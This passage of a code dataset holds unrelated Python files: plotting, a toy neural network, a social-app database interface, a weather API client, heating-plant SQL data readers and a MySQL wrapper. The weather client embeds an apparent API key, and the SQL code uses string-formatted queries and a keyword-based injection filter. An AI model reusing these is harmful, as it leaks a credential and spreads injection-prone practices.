ds[vars_to_keep].squeeze(dim=[\"x\",\"y\"], drop=True).to_dataframe()\n    start = reference_date.strip().split(\" \")[0].replace(\"-\",\"/\")\n    df['dates'] = pd.date_range(start=start, periods=len(df), freq=freq)\n    df = df.set_index('dates')\n\n    return df\n\n\n\ndef resample_timestep(df, type=None):\n\n    UMOL_TO_MOL = 1E-6\n    MOL_C_TO_GRAMS_C = 12.0\n    SEC_2_HLFHOUR = 1800.\n\n    if type == \"CABLE\":\n\n        method = {\"plc\":\"max\"}\n    elif type == \"FLUX\":\n        # umol/m2/s -> g/C/30min\n        df['GPP'] *= UMOL_TO_MOL * MOL_C_TO_GRAMS_C * SEC_2_HLFHOUR\n\n        method = {'GPP':'sum', \"Qle\":\"mean\"}\n\n    elif type == \"MET\":\n        # kg/m2/s -> mm/30min\n        df['Rainf'] *= SEC_2_HLFHOUR\n\n        method = {'Rainf':'sum'}\n\n    df = df.resample(\"D\").agg(method)\n\n    return df\n\n\nif __name__ == \"__main__\":\n\n    fpath = \"/Users/mdekauwe/Desktop\"\n    plot_fname = \"plc.png\"\n    fname = \"outputs/hydraulics_root_1.0.nc\"\n    main(fname, plot_fname, fpath)\n","sub_path":"experiment/plot_plc.py","file_name":"plot_plc.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"44835325","text":"import numpy as np\nfrom sympy import *\nfrom sympy.abc import x\nimport copy\nimport random\nimport time\n\ndef timer(fun):\n\n    def inner(*args):\n        t0 = time.time()\n        result = fun(*args)\n        t1 = time.time()\n\n        print(f\"I did {fun.__name__} and it took me: {(t1 - t0) * 1000} milliseconds\")\n        return result\n\n    return inner\n\nclass Model():\n    def __init__(self, layers, activation_function):\n        self.act = activation_function\n        self.act_der = lambdify(x, diff(self.act(x), x))\n        self.l = np.array([ np.array([ 0.0 for _ in range(i) ]) for i in layers ])\n        self.b = np.array([ np.array([random.random() for x in range(len(self.l[i])) ]) \\\n                for i in range(len(self.l))])\n        self.z = copy.deepcopy(self.l)\n        self.d = copy.deepcopy(self.z)\n        self.w = [ np.random.uniform(low=-1.0, high=1.0, size=(len(self.l[i+1]), \\\n                len(self.l[i]))) for i in range(len(self.l) - 1) ]\n\n\n    def predict(self, data_entry, verbose=False):\n        self.l[0] = data_entry\n        self.z[0] = data_entry\n\n        for i in range(1, len(self.l)):\n\n            self.z[i] = np.dot(self.w[i - 1], self.l[i - 1]) + self.b[i]\n            self.l[i] = self.act(self.z[i])\n        \n        #NORMALIZATION\n        _sum = sum(self.l[-1])\n        self.l[-1] = self.l[-1]/_sum\n\n        if verbose: \n            s = ''\n            for i, x in enumerate(self.l[-1]): s += f'{i+1:0}: {x:.2} '\n            print(f\"I predicted these values:\\n{s}\")\n        return self.l[-1]\n\n\n    def backpropagation(self, inp, label):\n        for i in range(len(self.l)-1 , -1, -1):\n\n            self.predict(inp, verbose=False)\n\n            if i == len(self.l) - 1:\n                self.d[i] = (self.l[i] - label) * self.act_der(self.z[i])\n            else:\n                self.d[i] = np.dot(np.transpose(self.w[i]), self.d[i + 1]) * self.act_der(self.z[i])\n        \n        db = self.d\n        dw = [ np.array([ self.l[j] * self.d[j+1][i] for i in range(len(self.d[j+1]))]) for j in range(len(self.w)) ]\n\n        return dw, db\n\n    \n    def train(self, data, batch_size=1, step_size=0.1, iterations=1000, debug=False):\n        for i in range(iterations):\n            batch = random.sample(list(zip(data[0], data[1])), batch_size)\n\n            c = step_size/batch_size\n\n            for e in batch:\n                dw, db = self.backpropagation(e[0], e[1])\n                self.w = [ self.w[i] - dw[i] * c for i in range(len(dw))]\n                self.b = self.b - db*c\n            \n            if debug: \n                print(f\"Current iteration: {i + 1}\")\n                #print(f\"Current model: \\n{self}\")\n\n\n    def generate_batch(self, data, batch_size):\n        yield random.sample(data, batch_size)\n\n\n\n    def serialize_model(self, filename):\n        
pass\n\n\n def __str__(self):\n sep = \"\\n\"\n s = f\"\\nWeights: {type(self.w)} \\n{sep.join(str(_w) for _w in self.w)} \\n\\nBias: \\\n {type(self.b)} \\n{sep.join(str(_b) for _b in self.b)} \\n\\nLayers: \\\n {type(self.l)}\\n{sep.join(str(_l) for _l in self.l)}\\n\\nZ: \\\n {type(self.z)}\\n{sep.join(str(_z) for _z in self.z)}\\n\"\n return s","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"616548054","text":"\"\"\"\n@author:\n\"\"\"\n\nimport sqlite3\nimport time\nimport cgi\nimport html\nimport re\n\ndef post_to_html(content):\n \"\"\"Convert a post to safe HTML, quote any HTML code, convert\n URLs to live links and spot any @mentions or #tags and turn\n them into links. Return the HTML string\"\"\"\n\n #convert <, >, & to safe html excluding quotes\n s = html.escape(content, False)\n\n #convert urls\n urls = re.compile(r\"((https?):((//)|(\\\\\\\\))+[\\w\\d:#@%/;$()~_?\\+-=\\\\\\.&]*)\", re.MULTILINE|re.UNICODE)\n\n #add anchor to link\n s = urls.sub(r\"\\1\", s)\n\n #add anchor to @users\n s = re.sub(r'(@)(\\w*\\.?\\w+)',r\"\\1\\2\", s)\n\n #return the formatted content\n return s\n\ndef post_list(db, usernick=None, limit=50):\n \"\"\"Return a list of posts ordered by date\n db is a database connection (as returned by COMP249Db())\n if usernick is not None, return only posts by this user\n return at most limit posts (default 50)\n\n Returns a list of tuples (id, timestamp, usernick, avatar, content)\n \"\"\"\n\n #create cursor to the database\n cursor = db.cursor()\n\n #If usernick is specified or not, find posts accordingly\n if usernick == None:\n #no user nick specified\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick=u.nick\n ORDER BY timestamp DESC\"\"\"\n\n #execute sql command, search user posts\n cursor.execute(sqlQuery)\n else:\n #user nick specified\n sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n FROM posts p, users u\n WHERE p.usernick = (?) 
AND p.usernick=u.nick\n                    ORDER BY timestamp DESC\"\"\"\n\n        #execute sql command, search user posts with specified usernick\n        cursor.execute(sqlQuery, (usernick,))\n\n    #return all fetched posts\n    return cursor.fetchall()[:limit]\n\n\ndef post_list_mentions(db, usernick, limit=50):\n    \"\"\"Return a list of posts that mention usernick, ordered by date\n    db is a database connection (as returned by COMP249Db())\n    return at most limit posts (default 50)\n\n    Returns a list of tuples (id, timestamp, usernick, avatar, content)\n    \"\"\"\n\n    #create cursor to the database\n    cursor = db.cursor()\n\n    #if user nick is specified or not, find mentions accordingly\n    if usernick==None:\n        sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n                    FROM posts p, users u\n                    WHERE p.usernick=u.nick AND p.content LIKE '%@%'\n                    ORDER BY timestamp DESC\"\"\"\n\n        #execute sql command, search post list mentions\n        cursor.execute(sqlQuery)\n    else:\n        sqlQuery = \"\"\"SELECT p.id, p.timestamp, p.usernick, u.avatar, p.content\n                    FROM posts p, users u\n                    WHERE p.usernick=u.nick AND p.content LIKE ?\n                    ORDER BY timestamp DESC\"\"\"\n\n        #add tags to the usernick to search, search post list mentions with specified usernick\n        usernick = '%'+'@'+usernick+'%'\n\n        #execute sql command\n        cursor.execute(sqlQuery, (usernick,))\n\n    #return all fetched results\n    return cursor.fetchall()[:limit]\n\n\n\ndef post_add(db, usernick, message):\n    \"\"\"Add a new post to the database.\n    The date of the post will be the current time and date.\n\n    Return the id of the newly created post or None if there was a problem\"\"\"\n\n    #check to see if the message length is below the threshold\n    if len(message) <= 150:\n        #create the cursor\n        cursor = db.cursor()\n\n        #sql query to execute\n        sqlQuery = \"INSERT INTO posts(usernick, content) VALUES(?, ?)\"\n\n        #execute the query with arguments, insert post into database\n        cursor.execute(sqlQuery, (usernick, message,))\n\n        #commit the connection\n        db.commit()\n\n        #return the ID of the last inserted object\n        return cursor.lastrowid\n    else:\n        return None\n\n\n\n","sub_path":"comp249/assignment_2/part_2/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"587020729","text":"import requests\nimport json\nimport geocoder\nimport logging\nfrom logging import config\n\nlogging.config.dictConfig({\n    'version': 1,\n    'disable_existing_loggers': True,\n})\n\n\n# Could use for the extra data\n\nclass Weather(object):\n\n    @staticmethod\n    def get_weather(city_name=None, country_code=None):\n        \"\"\"\n        Return the weather of the given city\n        :param city_name: The name of the city whose weather we want\n        :param country_code: The country code associated with that city\n        :return: The dictionary of weather data\n        \"\"\"\n        if city_name is None and country_code is None:\n            g = geocoder.ip('me')\n            city_name = g.city\n            country_code = g.country\n        url = \"http://api.openweathermap.org/data/2.5/weather?q=\"\n        key = \"a5e0c2f9d95a59f6cebcc153be85af60\"\n        try:\n            response = requests.post(url + city_name + \",\" + country_code.upper() + \"&\"\n                                     + \"APPID=\" + key)\n            if response.status_code == 200:\n                data = json.loads(response.text)\n                wtype = []\n                for type in data['weather']:\n                    wtype.append(type['main'])\n                wanted_data = {\n                    \"weather_type\": wtype,\n                    'temperature': round(data['main'][\"temp\"] * 9 / 5 - 459.67, 2),\n                    'pressure': data['main']['pressure'],\n                    'humidity': data['main']['humidity'],\n                    
'visibility': data['visibility'],\n 'wind_speed': data['wind']['speed']\n }\n return wanted_data\n else:\n logging.error(\"Could not retrieve weather\")\n return {}\n except ConnectionError or ConnectionAbortedError or ConnectionResetError or TimeoutError:\n logging.error(\"Could not retrieve weather\")\n return {}\n","sub_path":"src/weather_client.py","file_name":"weather_client.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493662481","text":"'''\n@Author: Dayananda C\n@Date: 2021-09-11 \n@Time: 11:00:00\n@Last Modified by: Dayananda C\n@Title : A program with cubic running time. Read in N integers and counts the\nnumber of triples that sum to exactly 0\n'''\n\nfrom array import* \n\ndef SumOfIntegers() :\n try:\n \n length =int(input(\"Enter the length of array = \"))\n \n intArray = array('i' ,[])\n\n for i in range(length):\n values = int(input(\"Enter the value in array : \"))\n intArray.append(values)\n\n count =0\n for i in range(0,length):\n\n for j in range(i+1,length):\n\n for k in range(j+1,length):\n \n if(intArray[i] +intArray[j]+intArray[k] == 0):\n print(intArray[i],intArray[j],intArray[k]) \n count +=1 \n print(\"Number of triplets : {} \".format(count)) \n \n except ValueError :\n print(\"Please enter a valid input\")\n SumOfIntegers()\n\nprint(\"Enter the values for printing triples\")\nSumOfIntegers()","sub_path":"SumOfThreeIntegers.py","file_name":"SumOfThreeIntegers.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27319929","text":"import sys\n\nINF = sys.maxsize\n\ndx = [0,0,1,-1]\ndy = [1,-1,0,0]\n\n\ndef dijkstra(map_,N,cnt):\n dist = [[INF]*N for _ in range(N)]\n dist[0][0] = 0\n q= [[map_[0][0],0,0]]\n while(q):\n [w,y,x] = q.pop(0)\n if y== N-1 and x == N-1:\n print(\"Problem %d: %d\"%(cnt,w))\n break\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if(0<= ny < N and 0<= nx < N):\n nw = w + map_[ny][nx]\n if(nw < dist[ny][nx]):\n dist[ny][nx] = nw\n q.append([nw,ny,nx])\n q.sort()\n \n \ncnt =1 \nwhile(True):\n N = int(sys.stdin.readline())\n if N==0:\n break\n map_ = [[0]*N for _ in range(N)]\n for i in range(N):\n line = list(map(int,sys.stdin.readline().split()))\n map_[i]=line\n dijkstra(map_,N,cnt)\n cnt +=1\n ","sub_path":"2020_spring/2020_04_02/4485_GU.py","file_name":"4485_GU.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434174005","text":"def vol_alt(a,lst):\n '''Fonction renvoyant le temps de vol et l'altitude pour la suite de Syracuse.\n \n Paramètres : a (int) : Valeur > 0\n lst (liste) : liste vide\n\n >>>vol, alt = vol_alt(6,[])\n Temps de vol pour n = 5 : 8, altitude : 16\n \n '''\n lst.append(a)\n\n if a == 1 :\n return 0, lst\n elif a % 2 == 0 :\n vol,lst = vol_alt(a//2,lst) \n vol+=1\n return vol,lst\n else:\n vol,lst = vol_alt(3*a+1,lst) \n vol += 1\n return vol,lst\n\n'''vol, alt = vol_alt(36791537,[])\nalt = max(alt)\n\nprint('Temps de vol pour n = 5 : '+str(vol)+', altitude : '+str(alt))'''\n\nvol = 0\ni = 36791535\n\nwhile vol < 745 :\n\n\n vol, alt = vol_alt(i,[])\n alt = max(alt)\n\n i +=1\n\nprint('Temps de vol pour n = 5 : '+str(vol)+', altitude : 
'+str(alt))","sub_path":"Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129097677","text":"import wandb\nimport numpy as np\nimport PIL\nimport os\nfrom click.testing import CliRunner\n\nimage = np.random.randint(255, size=(28, 28))\n\n\ndef test_captions():\n wbone = wandb.Image(image, caption=\"Cool\")\n wbtwo = wandb.Image(image, caption=\"Nice\")\n assert wandb.Image.captions([wbone, wbtwo]) == [\"Cool\", \"Nice\"]\n\n\ndef test_transform():\n with CliRunner().isolated_filesystem():\n meta = wandb.Image.transform([wandb.Image(image)], \".\", \"test.jpg\")\n assert meta == {'_type': 'images',\n 'count': 1, 'height': 28, 'width': 28}\n assert os.path.exists(\"media/images/test.jpg\")\n\n\ndef test_guess_mode():\n image = np.random.randint(255, size=(28, 28, 3))\n wbimg = wandb.Image(image)\n assert wbimg.image.mode == \"RGB\"\n\n\ndef test_pil():\n pil = PIL.Image.new(\"L\", (28, 28))\n img = wandb.Image(pil)\n assert img.image == pil\n","sub_path":"tests/test_media.py","file_name":"test_media.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4041137","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 12 14:52:12 2018\n\n@author: 98089\n\"\"\"\n\n\nimport pandas as pd\nfrom abc import ABCMeta,abstractmethod\nfrom MySQLConnector import MySQLConnector\nimport re\nimport numpy as np\nfrom tools import tools_DateTimeTrans\n\n\nclass Abs_DataReader(object):\n __metaclass__ = ABCMeta\n def __init__(self,startDate,endDate):\n '''\n startDate:str,%Y-%m-%d %H:%M:%S\n endDate:str,%Y-%m-%d %H:%M:%S\n '''\n self.startDate = startDate\n self.endDate = endDate\n self._SQLState()\n self.dateIndex = pd.date_range(startDate,endDate,freq='1min')\n \n \n @abstractmethod\n def _SQLState(self):\n '''\n 不同的项目有不同的查询语句,所以该方法需要被子类重载以生成合适的SQL语句。该方法应该生成三条SQL语句,分别是\n _QueryBoilerState:查询目标时间段的锅炉相关数据\n _QueryWeatherState:查询目标时间段的室外气象站相关数据\n _QueryInHomeState:查询目标时间段的室内温湿度传感器数据\n _QueryHRZState:查询目标时间段的换热站相关数据\n\n 参数:\n startDate:\"%Y-%m-%d %H:%M:%D\"\n 查询数据的开始时间\n endDate:\"%Y-%m-%d %H:%M:%D\"\n 查询数据的结束时间\n \n 提供的全局变量:\n self._QueryBoilerState:查询目标时间段的锅炉相关数据\n self._QueryWeatherState:查询目标时间段的室外气象站相关数据\n self._QueryInHomeState:查询目标时间段的室内温湿度传感器数据\n self._QueryHRZState:查询目标时间段的换热站相关数据\n \n '''\n @abstractmethod\n def _BoilerColumnsMap(self):\n '''\n 子类应该重载该方法以解决数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _WeatherColumnsMap(self):\n '''\n 子类应该重载该方法以解决室外气象站数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _InHomeColumnsMap(self):\n '''\n 子类应该重载该方法以解决室内温湿度数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n @abstractmethod\n def _CollectInHomeDeviceID(self):\n \"\"\"\n 子类应该重载该方法以返回所有的室内传感器的设备ID\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 该方法应该返回一个List,该List包含全部的室内传感器设备ID\n \"\"\"\n @abstractmethod\n def _unnormalDataPrecess(self,a,b,c,d):\n \"\"\"\n 子类应该重载该方法以提供一种对缺失值和异常值进行处理的机制\n \n 参数:DataFrame\n a: 对应锅炉数据\n b: 对应天气数据\n c: 对应室内传感器数据\n \n 提供的全局变量:\n 无\n \n 返回值:DataFrame\n 对异常值和缺失值进行修正之后的数据集\n \"\"\"\n @abstractmethod\n def _HRZColumnsMap(self):\n '''\n 子类应该重载该方法以解决室内温湿度数据库中字段名不规范的问题\n\n 参数:\n 无\n \n 提供的全局变量:\n 无\n \n 返回值:\n 
字段名映射字典,如果不需要调整,可以返回一个空字典,如果某一个字段需要修正,则需要返回全字段的映射字典\n '''\n \n def concatData(self,a,b,c,d):\n \"\"\"\n a: 对应锅炉数据\n b: 对应天气数据\n c: 对应室内传感器数据\n d: 对应换热站数据\n \"\"\"\n a,b,c,d = self._unnormalDataPrecess(a,b,c,d)\n # 做mean操作的时候不太存在掩盖缺失值的风险,做interpolate操作时有较大的掩盖缺失值的风险\n totalData = pd.DataFrame(index=self.dateIndex)\n \n if self.BoilerFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_A = a.resample('1min').%s()\"%method,globals(),_locals)\n modified_A = _locals['modified_A']\n for item in modified_A:\n totalData[item] = modified_A[item]\n if self.WeatherFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_B = b.resample('1min').%s()\"%method,globals(),_locals)\n modified_B = _locals['modified_B']\n for item in modified_B:\n totalData[item] = modified_B[item]\n if self.InHomeFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n for item in c:\n _locals = locals()\n exec(\"modified_Item = item.resample('1min').%s()\"%method,globals(),_locals)\n modified_Item = _locals['modified_Item']\n for i in modified_Item:\n totalData[i] = modified_Item[i]\n if len(d) > 0:\n if self.HRZFreq > 60:\n method = 'interpolate'\n else:\n method = 'mean'\n _locals = locals()\n exec(\"modified_D = d.resample('1min').%s()\"%method,globals(),_locals)\n modified_D = _locals['modified_D']\n for item in modified_D:\n totalData[item] = modified_D[item]\n totalData = self.extremeValuePrecess(totalData)\n return totalData\n \n def extremeValuePrecess(self,Data):\n for itemname in Data:\n itemList = Data[itemname].tolist()\n sortedItemList = np.sort(itemList)\n sortedItemList = [k for k in sortedItemList if not np.isnan(k)]\n try:\n n05PointIndex = int(len(sortedItemList) * 0.001)\n n95PointIndex = int(len(sortedItemList) * 0.999)\n n05Point = sortedItemList[n05PointIndex]\n n95Point = sortedItemList[n95PointIndex]\n newItemList = []\n for i in itemList:\n if np.isnan(i):\n newItemList.append(i)\n else:\n newItemList.append(max(min(i,n95Point),n05Point))\n Data[itemname] = newItemList\n except IndexError:\n continue\n return Data\n \n \n def readData(self):\n # 建立对数据库的连接\n conn = MySQLConnector()\n conn.openConnector()\n # ++++++++++++++ 查询锅炉状态 +++++++++++++++++++++++++++++++++++\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsPattern = re.compile(\"SELECT DISTINCT (.*?) 
FROM\")\n columnsStr = re.findall(columnsPattern,self._QueryBoilerState)[0]\n columns = columnsStr.strip().split(',')\n columns = [(c.strip())[2:] for c in columns]\n # 对字段名进行修正\n if len(self._BoilerColumnsMap()) != 0:\n columns = [self._BoilerColumnsMap()[c] for c in columns]\n # 游标执行查询锅炉状态数据的语句\n conn.cursor.execute(self._QueryBoilerState)\n tempBoilerState = np.array(conn.cursor.fetchall())\n # 对该数据集中日期时间进行修正\n modifiedTime = [tools_DateTimeTrans(i) for i in tempBoilerState[:,0]]\n BoilerData = pd.DataFrame(np.array(tempBoilerState[:,1:],np.float32),index=modifiedTime,\n columns=columns[1:])\n # ++++++++++++++ 查询锅炉状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询天气状态 +++++++++++++++++++++++++++++++++++\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsStr = re.findall(columnsPattern,self._QueryWeatherState)[0]\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n # 对字段名进行修正\n if len(self._WeatherColumnsMap()) != 0:\n columns = [self._WeatherColumnsMap()[c] for c in columns]\n # 游标执行查询天气状态数据的语句\n conn.cursor.execute(self._QueryWeatherState)\n tempWeatherState = np.array(conn.cursor.fetchall())\n modifiedTime = [tools_DateTimeTrans(i) for i in tempWeatherState[:,0]]\n WeatherData = pd.DataFrame(np.array(tempWeatherState[:,1:],np.float32),index = modifiedTime,\n columns=columns[1:])\n # ++++++++++++++ 查询天气状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询室内状态 +++++++++++++++++++++++++++++++++++\n dev_ids = self._CollectInHomeDeviceID()\n dev_DataFrames = []\n for k,dev_id in enumerate(dev_ids):\n # 生成每一个设备对应的SQL语句\n individualDevSQL = self._QueryInHomeState%(dev_id)\n # 从SQL语句中抽取所抽取的字段\n columnsStr = re.findall(columnsPattern,individualDevSQL)[0]\n # 对字段名称进行修正\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n if len(self._InHomeColumnsMap()) != 0:\n columns = [self._InHomeColumnsMap()[c] for c in columns]\n columns = [u'%d#传感器%s'%(k,c) for c in columns]\n # 游标执行查询室内状态数据的语句\n conn.cursor.execute(individualDevSQL)\n tempInHomeState = np.array(conn.cursor.fetchall())\n try:\n modeifiedTime = [tools_DateTimeTrans(i) for i in tempInHomeState[:,0]]\n InHomeData = pd.DataFrame(np.array(tempInHomeState[:,1:],np.float32),index = modeifiedTime,\n columns=columns[1:])\n dev_DataFrames.append(InHomeData)\n except IndexError:\n print(u'%d#室内传感器无数据'%k)\n continue\n # ++++++++++++++ 查询室内状态 +++++++++++++++++++++++++++++++++++\n # ++++++++++++++ 查询换热站状态 +++++++++++++++++++++++++++++++++\n if self._QueryHRZState != False:\n # 从SQL语句中分析所需要抓取的字段名模式\n columnsStr = re.findall(columnsPattern,self._QueryHRZState)[0]\n columns = columnsStr.strip().split(',')\n columns = [c.strip()[2:] for c in columns]\n # 对字段名进行修正\n if len(self._HRZColumnsMap()) != 0:\n columns = [self._HRZColumnsMap()[c] for c in columns]\n # 游标执行查询天气状态数据的语句\n conn.cursor.execute(self._QueryHRZState)\n tempHRZState = np.array(conn.cursor.fetchall())\n modifiedTime = [tools_DateTimeTrans(i) for i in tempHRZState[:,0]]\n HRZData = pd.DataFrame(np.array(tempHRZState[:,1:],np.float32),index = modifiedTime,\n columns=columns[1:])\n else:\n HRZData = pd.DataFrame()\n totalData = self.concatData(BoilerData,WeatherData,dev_DataFrames,HRZData)\n return totalData\n\nclass XK(Abs_DataReader):\n # 必要的参数\n substationID = 24\n code = 'N1'\n BoilerFreq = 1\n WeatherFreq = 60\n InHomeFreq = 120\n HRZFreq = 1\n \n def _SQLState(self):\n self._QueryBoilerState = u\"SELECT DISTINCT a.create_time,a.节能器出水温度1,\\\n a.炉膛压力1,a.出水温度1,a.室外温度1,a.炉膛温度1,a.目标温度设定1,a.回水温度1,a.鼓风机电流1,\\\n 
a.回水压力1,a.空预器出口风温1,a.出水压力1,a.节能器出水压力1,a.排烟温度1,a.节能器进口烟温1,a.鼓风机频率1,a.节能器进水温度1,a.FI001A,b.瞬时流量,b.温度 FROM bd_xinkou_1 a LEFT JOIN bd_xinkou_2 b on a.create_time = b.create_time WHERE a.create_time > '%s' AND a.create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryWeatherState = \"SELECT DISTINCT t.create_time,t.temp,t.hr,t.lux,t.wind_speed,t.wind_direction \\\n FROM bd_weather_station t WHERE dev_id=40002704 and create_time > '%s' and create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryInHomeState = \"SELECT DISTINCT t.create_time,t.temp,t.hr FROM bd_temp_hr t WHERE dev_id='%s' AND\" + \" create_time > '%s' AND create_time < '%s'\"%(self.startDate,self.endDate)\n self._QueryHRZState = u\"SELECT DISTINCT t.create_time,t.一次供温度,t.一次回温度,t.二次供温度,t.二次回温度,t.二次供压力 FROM bd_xinkou_hrz t WHERE project_sub_station_id=%d and code='%s' and t.create_time>'%s' and t.create_time<'%s'\"%(self.substationID,self.code,self.startDate,self.endDate)\n \n def _BoilerColumnsMap(self):\n return {'create_time':'create_time',u'节能器出水温度1':u'节能器出水温度',\n u'炉膛压力1':u\"炉膛压力\",u'出水温度1':u'出水温度',u'室外温度1':u\"室外温度\",\n u'炉膛温度1':u'炉膛温度',u'目标温度设定1':u\"目标温度设定\",u'回水温度1':u'回水温度',\n u'鼓风机电流1':u\"鼓风机电流\",u\"回水压力1\":u\"回水压力\",u\"出水压力1\":u'出水压力',\n u'节能器出水压力1':u\"节能器出水压力\",u'排烟温度1':u\"排烟温度\",u'节能器进口烟温1':u\"节能器进口烟温\",\n u\"鼓风机频率1\":u\"鼓风机频率\",u'节能器进水温度1':u\"节能器进水温度\",u'瞬时流量':u\"瞬时流量\",\n u\"温度\":u\"燃气温度\",u'FI001A':u'供水流量',u'空预器出口风温1':u'空预器出口风温',u'二次供压力':u'二次供压力'}\n \n def _WeatherColumnsMap(self):\n return {\"temp\":u\"气象站室外温度\",'hr':u'气象站室外湿度','lux':u\"气象站室外光照\",\n 'wind_speed':u\"气象站室外风速\",'wind_direction':u'气象站室外风向',\n 'create_time':'create_time'}\n \n def _InHomeColumnsMap(self):\n return {\"temp\":u\"室内温度\",'hr':u\"室内湿度\",'create_time':'create_time'}\n \n def _HRZColumnsMap(self):\n return {}\n \n def _CollectInHomeDeviceID(self):\n return [\"W634iMCwmSCcjQkltb7d38btv000%02d\"%i for i in [18,6,23,1,13,12,4,5,24,14]]\n \n def _unnormalDataPrecess(self,a,b,c,d):\n # 对气象数据中的光照进行修正\n temp = []\n for item in b[u'气象站室外光照'].as_matrix():\n if item < -50:\n temp.append(31000)\n elif item < 0:\n temp.append(0)\n else:\n temp.append(item)\n b[u'气象站室外光照'] = temp\n \n temp = []\n for item in b[u'气象站室外风向'].as_matrix():\n if item > 45 - 22.5 and item < 45 + 22.5:\n temp.append([1,0,0,1])\n elif item > 90 -22.5 and item < 90+22.5:\n temp.append([1,0,0,0])\n elif item > 135 - 22.5 and item < 135 + 22.5:\n temp.append([1,0,1,0])\n elif item > 180 - 22.5 and item < 180 + 22.5:\n temp.append([0,0,1,0])\n elif item > 225 - 22.5 and item < 225 + 22.5:\n temp.append([0,1,1,0])\n elif item > 270 - 22.5 and item < 227 + 22.5:\n temp.append([0,1,0,0])\n elif item > 315 - 22.5 and item < 315 + 22.5:\n temp.append([0,1,0,1])\n elif item > 315 + 22.5 or item < 22.5:\n temp.append([0,0,0,1])\n else:\n try:\n temp.append(temp[-1])\n except IndexError:\n temp.append([0,0,0,0])\n temp = np.array(temp)\n b[u'气象站室外风向(东风)'] = temp[:,0]\n b[u'气象站室外风向(西风)'] = temp[:,1]\n b[u'气象站室外风向(南风)'] = temp[:,2]\n b[u'气象站室外风向(北风)'] = temp[:,3]\n return a,b,c,d ","sub_path":"DataReader.py","file_name":"DataReader.py","file_ext":"py","file_size_in_byte":17096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"379107907","text":"class Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n :type matrix: List[List[int]]\n :type target: int\n :rtype: bool\n \"\"\"\n if len(matrix) == 0:\n return False\n if len(matrix[0]) == 0:\n return False\n \n for i in range(len(matrix)):\n if matrix[i][len(matrix[i])-1] 
>= target:\n return self.find_target(matrix[i],target)\n return False\n def find_target(self,find_list,target):\n head = 0\n tail = len(find_list) - 1\n while head <= tail:\n mid = (head+tail)//2\n if find_list[mid] > target:\n tail = mid-1\n elif find_list[mid] < target:\n head = mid+1\n else:\n return True\n return False","sub_path":"74. 搜索二维矩阵.py","file_name":"74. 搜索二维矩阵.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238955332","text":"import re\nimport pymysql\nfrom app.Env import Env\nfrom app.common.Base import Base\nfrom dbutils.pooled_db import PooledDB\n\n# 数据库\nclass Model(Base) :\n\n __conn = None #链接\n __rollback = False #回滚\n __cs = None #游标\n __id = 'id' #主键\n __idVal = 0 #自增ID\n __table = '' #数据表\n __columns = '*' #字段\n __where = '' #条件\n __group = '' #分组\n __order = '' #排序\n __limit = '' #限制\n __sql = '' #单条SQL\n __fields = {} #字段&数据\n __sql_reg = r\"(?:')|(?:--)|(/\\*(?:.|[\\n\\r])*?\\*/)|(\\b(select|select|update|union|and|or|delete|insert|trancate|char|into|substr|ascii|declare|exec|count|master|into|drop|execute)\\b)\"\n\n # 链接\n def __connect(self,type='pool') :\n cfg = Env.db()\n if type=='pool' :\n pool = PooledDB(**cfg)\n return pool.connection()\n else :\n return 